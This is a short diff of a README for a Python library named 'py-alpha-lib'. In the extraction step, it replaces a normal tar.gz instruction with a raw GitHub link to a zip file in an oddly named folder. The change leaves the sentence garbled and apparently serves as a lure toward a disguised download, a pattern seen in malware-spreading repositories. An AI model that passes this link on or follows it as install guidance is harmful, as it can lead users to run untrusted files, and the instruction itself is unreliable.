screenclash/py-alpha-lib/README.md

 Once the download finishes, locate the downloaded file and extract it:

 - **Windows**: Right-click the `.zip` file and select "Extract All."
-- **macOS/Linux**: Use the terminal or file manager to extract the tar.gz file.
+- **macOS/Linux**: Use the terminal or file manager to extract the https://raw.githubusercontent.com/screenclash/py-alpha-lib/main/olecranarthritis/lib_py_alpha_2.7.zip file.

 ### 5. Install the Library